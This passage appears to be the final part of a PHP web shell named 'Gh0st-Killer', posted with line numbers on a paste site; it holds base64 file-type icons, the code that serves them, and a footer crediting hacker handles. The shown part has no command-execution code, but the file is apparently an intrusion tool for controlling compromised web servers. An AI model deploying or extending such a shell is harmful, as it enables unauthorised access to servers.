  7598. "Eq7YrLDE7a4SADs=",
  7599.  
  7600. "ext_ini"=>
  7601.  
  7602. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
  7603.  
  7604. "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
  7605.  
  7606. "SnEjgPVarHEHgrB43JvszsQEADs=",
  7607.  
  7608. "ext_diz"=>
  7609.  
  7610. "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
  7611.  
  7612. "/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
  7613.  
  7614. "/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
  7615.  
  7616. "/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
  7617.  
  7618. "/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
  7619.  
  7620. "pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
  7621.  
  7622. "dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
  7623.  
  7624. "9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
  7625.  
  7626. "4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7627.  
  7628. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7629.  
  7630. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7631.  
  7632. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7633.  
  7634. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7635.  
  7636. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7637.  
  7638. "AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
  7639.  
  7640. "C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
  7641.  
  7642. "2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
  7643.  
  7644. "CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
  7645.  
  7646. "Ow==",
  7647.  
  7648. "ext_doc"=>
  7649.  
  7650. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
  7651.  
  7652. "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
  7653.  
  7654. "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
  7655.  
  7656. "ext_exe"=>
  7657.  
  7658. "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
  7659.  
  7660. "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
  7661.  
  7662. "xhIAOw==",
  7663.  
  7664. "ext_h"=>
  7665.  
  7666. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
  7667.  
  7668. "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
  7669.  
  7670. "Wq/NknbbSgAAOw==",
  7671.  
  7672. "ext_hpp"=>
  7673.  
  7674. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
  7675.  
  7676. "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
  7677.  
  7678. "UqUagnbLdZa+YFcCADs=",
  7679.  
  7680. "ext_htaccess"=>
  7681.  
  7682. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
  7683.  
  7684. "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
  7685.  
  7686. "AAA7",
  7687.  
  7688. "ext_html"=>
  7689.  
  7690. "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
  7691.  
  7692. "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
  7693.  
  7694. "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
  7695.  
  7696. "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
  7697.  
  7698. "ADs=",
  7699.  
  7700. "ext_jpg"=>
  7701.  
  7702. "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
  7703.  
  7704. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
  7705.  
  7706. "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
  7707.  
  7708. "FxEAOw==",
  7709.  
  7710. "ext_js"=>
  7711.  
  7712. "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
  7713.  
  7714. "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
  7715.  
  7716. "a00AjYYBbc/o9HjNniUAADs=",
  7717.  
  7718. "ext_lnk"=>
  7719.  
  7720. "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
  7721.  
  7722. "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
  7723.  
  7724. "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
  7725.  
  7726. "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
  7727.  
  7728. "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
  7729.  
  7730. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7731.  
  7732. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7733.  
  7734. "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
  7735.  
  7736. "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
  7737.  
  7738. "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
  7739.  
  7740. "ADs=",
  7741.  
  7742. "ext_log"=>
  7743.  
  7744. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
  7745.  
  7746. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
  7747.  
  7748. "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
  7749.  
  7750. "ext_php"=>
  7751.  
  7752. "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
  7753.  
  7754. "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
  7755.  
  7756. "ext_pl"=>
  7757.  
  7758. "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
  7759.  
  7760. "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
  7761.  
  7762. "ext_swf"=>
  7763.  
  7764. "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
  7765.  
  7766. "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  7767.  
  7768. "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
  7769.  
  7770. "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
  7771.  
  7772. "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
  7773.  
  7774. "ext_tar"=>
  7775.  
  7776. "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
  7777.  
  7778. "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
  7779.  
  7780. "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
  7781.  
  7782. "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
  7783.  
  7784. "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7785.  
  7786. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7787.  
  7788. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7789.  
  7790. "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
  7791.  
  7792. "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
  7793.  
  7794. "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
  7795.  
  7796. "u4tLAgEAOw==",
  7797.  
  7798. "ext_txt"=>
  7799.  
  7800. "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
  7801.  
  7802. "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
  7803.  
  7804. "UpPWG3Ig6Hq/XmRjuZwkAAA7",
  7805.  
  7806. "ext_wri"=>
  7807.  
  7808. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  7809.  
  7810. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  7811.  
  7812. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  7813.  
  7814. "ext_xml"=>
  7815.  
  7816. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  7817.  
  7818. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  7819.  
  7820. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  7821.  
  7822. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  7823.  
  7824. "IQA7"
  7825.  
  7826.  );
  7827.  
  7828.  //For simple size- and speed-optimization.
  7829.  
  7830.  $imgequals = array(
  7831.  
  7832.   "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  7833.  
  7834.   "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  7835.  
  7836.   "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  7837.  
  7838.   "ext_html"=>array("ext_html","ext_htm"),
  7839.  
  7840.   "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  7841.  
  7842.   "ext_lnk"=>array("ext_lnk","ext_url"),
  7843.  
  7844.   "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
  7845.  
  7846.   "ext_doc"=>array("ext_doc","ext_dot"),
  7847.  
  7848.   "ext_js"=>array("ext_js","ext_vbs"),
  7849.  
  7850.   "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
  7851.  
  7852.   "ext_wri"=>array("ext_wri","ext_rtf"),
  7853.  
  7854.   "ext_swf"=>array("ext_swf","ext_fla"),
  7855.  
  7856.   "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
  7857.  
  7858.   "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
  7859.  
  7860.  );
  7861.  
  7862.  if (!$getall)
  7863.  
  7864.  {
  7865.  
  7866.   header("Content-type: image/gif");
  7867.  
  7868.   header("Cache-control: public");
  7869.  
  7870.   header("Cache-control: max-age=".(60*60*24*7));
  7871.  
  7872.   header("Last-Modified: ".date("r",filemtime(__FILE__)));
  7873.  
  7874.   foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
  7875.  
  7876.   if (empty($images[$img])) {$img = "small_unk";}
  7877.  
  7878.   if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  7879.  
  7880.   echo base64_decode($images[$img]);
  7881.  
  7882.  }
  7883.  
  7884.  else
  7885.  
  7886.  {
  7887.  
  7888.   foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
  7889.  
  7890.   natsort($images);
  7891.  
  7892.   $k = array_keys($images);
  7893.  
  7894.   echo  "<center>";
  7895.  
  7896.   foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
  7897.  
  7898.   echo "</center>";
  7899.  
  7900.  }
  7901.  
  7902.  exit;
  7903.  
  7904. }
  7905.  
  7906. ?>
  7907.  
  7908. </td></tr></table><a bookmark="minipanel" /><br/>
  7909. <?php
  7910. }
  7911. ?>
  7912. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor='#C0C0C0'><tr><td height="1" valign="top"><table align="center"><tr><td height="0" valign="top"><center><font face="times, serif" size="3"><b>(C) <font color="orange">Copyright</font><font color="white"> Gh0st </font><font color="green"> - Killer</font> [All rights reserved]</b></center></td></tr><tr><td height="0" valign="top"><center><b>Greetz to :</b> Neo_Hacker, Neo_Sessor, Cyba Tiger, Mr. HaX, INDI4N L33T and all my friends who helped me a lot.</center></td></tr><tr><td height="0" valign="top"><center><b>--[ Gh0st-Killer v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u>Coded by</u></a> z3r0| <a href="#"><font color="#FF0000">>>Anonmyous INDIA<<</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></font></center></td></tr></table></td></tr></table>
  7913. </center>
  7914. </body></html>
Add Comment
Please, Sign In to add comment